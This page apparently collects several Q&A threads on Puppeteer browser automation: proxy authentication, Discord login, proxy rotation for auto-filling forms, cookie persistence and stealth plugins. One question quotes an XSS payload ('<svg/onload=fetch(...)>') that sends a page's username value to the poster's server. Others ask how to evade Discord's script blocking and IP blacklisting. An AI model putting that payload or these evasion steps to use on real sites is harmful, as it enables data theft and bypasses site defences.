Puppeteer not loading page - NodeJs - node.js

Here is a simple program on puppeteer:
const puppeteer = require('puppeteer');
async function run() {
const browser = await puppeteer.launch({
headless: false,
args:[ `--proxy-server=104.233.50.38:3199`]
});
;
const page = await browser.newPage();
await page.authenticate({
username: 'myusername',
password: 'mypassword'
})
await page.goto('https://google.com')
};
run();
Note: I have tried similar with over 10 proxies and none of them are working in puppeteer
The credentials are exactly what is provided to me, I have checked multiple times.
This is what I get:
Now again , this is the console of the page:
Why is this happening?
I checked the addresses and username, password multiple times. There is no other error message except this.

It seems that page.authenticate is not working for me either,instead you can use page.setExtraHTTPHeaders
async function run() {
const browser = await puppeteer.launch({
ignoreHTTPSErrors: true,
args: ['--proxy-server=104.233.50.38:3199']
});
const page = await browser.newPage();
await page.setExtraHTTPHeaders
({'Proxy-Authorization': 'Basic ' + Buffer.from('username:password').toString('base64'),
});
};
run();

You can use puppeteer-page-proxy, it offers username and password auth very easily. It also supports http, https, socks4 and socks5 proxies. https://github.com/Cuadrix/puppeteer-page-proxy
You can define the proxy this way:
const proxy = 'http://login:pass#IP:Port';
or
const proxy = 'socks5://IP:Port';
Then you can use it per request:
const useProxy = require('puppeteer-page-proxy');
await page.setRequestInterception(true);
page.on('request', req => {
useProxy(req, proxy);
});

Related

Why Discord site isn't loaded with Puppeteer Node.js

await page.goto('https://discord.com/channels/850682587273625661/919026857926590535', { waitUntil: 'networkidle0', timeout: 0 });
await page.screenshot({ path: 'discor.png' })
The main idea here is that if I puppeteer.launch() site is loaded whereas I use puppeteer.connect() is looks as if Discord block my script. Are there any ways to bypass this restriction of Discord?
This url redirects you to a login page, you'd then have to actually log in as you would do manually:
await page.goto('https://discord.com/channels/850682587273625661/919026857926590535');
// enter email
const emailtarget = await page.waitForSelector("input[name=email]", {visible: true});
await emailtarget.type("my#email.com");
// enter password
const passtarget = await page.waitForSelector("input[name=password]", {visible: true});
await passtarget.type("mySecretPass");
// submit
const submitBtn = await page.waitForSelector("button[type=submit]", {visible: true});
await submitBtn.click();
// wait for redirection
await page.waitForNavigation();
// should be logged in, take screenshot
await page.screenshot({ path: 'discor.png' });

Node JS Puppeteer throws error at url with proxy

I'm making a automation script for filling a form online with puppeteer, and to not blacklist ip's I decided to use proxies for each request, this is the part which gives me error
console.log(`profile ${ii} started`)
let proxy = await proxy_rotation(proxy_data, ii);
console.log("using proxy: ", proxy);
let exec_path = path.resolve(path.dirname(process.execPath) + "/node_modules/puppeteer/.local-chromium/win64-869685/chrome-win/chrome.exe")
const browser = await puppeteer.launch({
executablePath: exec_path,
args: ['--disable-web-security']
});
const page = await browser.newPage();
console.log("1");
await page.setRequestInterception(true);
await useProxy(page, proxy);
console.log("2");
await page.goto(data[ii][0]); //this is where the error gets thrown
this part below doesn't get to run when using a proxy, without it, runs smotthly
console.log("3");
await page.type("#name", data[ii][1]);
await page.type("#yourEmail", data[ii][2]);
await page.type("#phone", data[ii][3]);
await page.type("#street", data[ii][4]);
await page.type("#city", data[ii][5]);
await page.type("#psc", data[ii][6]);
await page.select('select#state', data[ii][7]);
await page.select('select#prefered_size_sel', data[ii][8]);
await page.$eval('input[name="agreed_personal_info_tiny_contact_form"]', check => check.checked = true);
await page.evaluate(() => {
document.querySelector('input[name="agreed_personal_info_tiny_contact_form"]').click();
});
I just console logged a few numbers, to debug where the script is getting stuck. I also tested the proxy and website I'm trying to access both with a proxy tester and manually, and had no problem accessing it
but when I run my script I get this
I understand it pretty much says it cannot access the url, but there should be no reason for that. Do I need to change the way I'm acessing the url when using a proxy? Or add some extra args to the browser? Can I get a more specific error message somehow? Thanks for any suggestions
Also this is the puppeteer function that throws the error
async function navigate(client, url, referrer, frameId) {
try {
const response = await client.send('Page.navigate', {
url,
referrer,
frameId,
});
ensureNewDocumentNavigation = !!response.loaderId;
return response.errorText
? new Error(`${response.errorText} at ${url}`)
: null;
}
catch (error) {
return error;
}
}
That error indicates that something is off how you are using your proxy. Is useProxy your own function or the one from puppeteer-page-proxy? You mention setting the proxy per-request but seems you are setting it for the whole page, is that intentional? The way your proxy is formatted also seems off- check how I do it below.
You can try launching the browser with your proxy server and using page.authenticate() to handle auth. Like this:
let proxy = await proxy_rotation(proxy_data, ii);
const [host, port, username, password] = proxy.split(':');
const parsedProxy = new URL(`http://${username}:${password}#${host}:${port}`);
const browser = await puppeteer.launch({
executablePath: exec_path,
args: ['--disable-web-security', '--ignore-certificate-errors', `--proxy-server=${parsedProxy.host}`]
});
const page = await browser.newPage();
await page.authenticate({
username: parsedProxy.username,
password: parsedProxy.password,
});
Before doing that I would change what you pass to useProxy such that it looks like http://username:pw#host:port (Lines 2-3).

Puppeteer javascript on page won't execute when running on headless mode

I have a page (secretpage.php) containing JavaScript in the HTTP response which sends the value of the userName parameter to my server.
<svg/onload=fetch('http://localhost:8080/username='+document.getElementById("userName").innerHTML)>
On non-headless mode running Chrome, the JavaScript executed successfully and I got a callback on my local server with the value of the "userName" sent back.
However, on headless mode, the JavaScript did not execute at all which is quite puzzling.
I have attached my js file (test.js) here for reference.
node test.js
Output of test.js below
const puppeteer = require('puppeteer');
(async () => {
//const browser = await puppeteer.launch({ headless: false });
const browser = await puppeteer.launch();
const page = await browser.newPage();
await page.goto('http://localhost/forum/');
await page.type("#lbluserName", "john", { delay: 100 });
await page.type("#lblpassword", "password", { delay: 100 });
await page.click("#btnLogin");
//await page.waitForNavigation();
await page.waitFor(5000);
await page.setViewport({
width: 1280,
height: 800,
deviceScaleFactor: 1,
});
await page.goto('http://localhost/forum/pages/secretpage.php');
await page.waitForSelector('#comments');
await page.screenshot({ path: 'screenshot.png' });
await browser.close();
})();
Could anyone please help with troubleshooting this as this is rather peculiar?
Thank you!
I think you need to run chrome with enabling js in headless mode.
await puppeteer.launch({
args: [
'--enable-features=ExperimentalJavaScript'
]
})

Why chrome can't remember previous session with puppeteer?

I'm actually trying to use puppeteer for scraping and I need to use my current chrome to keep all my credentials. However, chrome can't remember previous session and I have to click the login button every time. By contrast, chrome can remember the saved credential. Is there a way to make it?
I'm actually using:
Node v12.16.1
chrome 80.0.3987.132 (Official Build) (64-bit) (cohort: Stable)
puppeteer-core 2.1.0 // see: https://github.com/puppeteer/puppeteer/blob/v2.1.0/docs/api.md
test.js:
const pptr = require('puppeteer-core');
(async () => {
const browser = await pptr.launch({
executablePath: 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe',//path to your chrome
headless: false,
args:[
'--user-data-dir=D:/Users/xxx/AppData/Local/Google/Chrome/User Data2',
]
});
const page = await browser.newPage();
await page.goto('https://hostloc.com');
await page.screenshot({path: 'example.png'});
await page.waitFor(10000);
await browser.close();
})();
You should use cookies so that you can get the previous data from them. Here is a link about the set cookie in the puppeteer.
Here below is an example of code for how to set cookies in puppeteer. It Sets the "login_email" property in a Paypal cookie so the login screen is pre-filled with an email address.
const cookie = {
name: 'login_email',
value: 'set_by_cookie#domain.com',
domain: '.paypal.com',
url: 'https://www.paypal.com/',
path: '/',
httpOnly: true,
secure: true
}
const puppeteer = require('puppeteer');
(async () => {
const browser = await puppeteer.launch()
const page = await browser.newPage()
await page.setCookie(cookie)
await page.goto('https://www.paypal.com/signin')
await page.screenshot({ path: 'paypal_login.png' })
await browser.close()
})()
Regarding get the cookies, You can create a Chrome DevTools Protocol session on the page target using target.createCDPSession(). Then you can send Network.getAllCookies to obtain a list of all browser cookies.
The page.cookies() function will only return cookies for the current URL. So we can filter out the current page cookies from all of the browser cookies to obtain a list of third-party cookies only.
const client = await page.target().createCDPSession();
const all_browser_cookies = (await client.send('Network.getAllCookies')).cookies;
const current_url_cookies = await page.cookies();
const third_party_cookies = all_browser_cookies.filter(cookie => cookie.domain !== current_url_cookies[0].domain);
console.log(all_browser_cookies); // All Browser Cookies
console.log(current_url_cookies); // Current URL Cookies
console.log(third_party_cookies); // Third-Party Cookies
For example, get all of the cookies
const puppeteer = require('puppeteer');
(async() => {
const browser = await puppeteer.launch({});
const page = await browser.newPage();
await page.goto('https://stackoverflow.com', {waitUntil : 'networkidle2' });
// Here we can get all of the cookies
console.log(await page._client.send('Network.getAllCookies'));
})();
I hope this will help you.

Puppeteer - How to browse google.com with proxies?

I am trying to browse google.com with puppeteer using proxies but Chromium seems to block me.
Code example:
const puppeteer = require('puppeteer');
(async() => {
const proxyUrl = 'http://gate.smartproxy.com:7000';
const username = 'xxxxx';
const password = 'xxxxx';
const browser = await puppeteer.launch({
args: [`--proxy-server=${proxyUrl}`],
headless: false,
});
const page = await browser.newPage();
await page.authenticate({ username, password });
await page.goto('https://google.com/');
const html = await page.$eval('body', e => e.innerHTML);
console.log(html);
await browser.close();
})();
Error:
(node:6673) UnhandledPromiseRejectionWarning: Error: net::ERR_TUNNEL_CONNECTION_FAILED at https://google.com/...
I already checked on the proxy side and they are working.
If it's not possible with puppeteer (since they are using Chromium), do you have any alternative ideas on how to browse Google with proxies?
Thanks,
Try replacing https with http, and consulting the proxy service and see what documents they have or what advice they can offer. Alternatively, find out what kind of proxy it is and how it normally behaves, and give us more info.
Try using pluginProxy:
const puppeteer = require('puppeteer-extra');
const StealthPlugin = require('puppeteer-extra-plugin-stealth')
const pluginProxy = require('puppeteer-extra-plugin-proxy');
(async() => {
puppeteer.use(StealthPlugin()); // Recommende
puppeteer.use(pluginProxy({
address: <proxy-host> ,
port: <proxy-port> ,
credentials: {
username: <proxy-user> ,
password: <proxy-pwd> ,
}
}));
let browser = await puppeteer.launch({
headless: false,
ignoreHTTPSErrors: true // Some proxies need it
});
let page = await browser.newPage();
await page.goto('https://google.com/');
const html = await page.$eval('body', e => e.innerHTML);
console.log(html);
await browser.close();
})();

Resources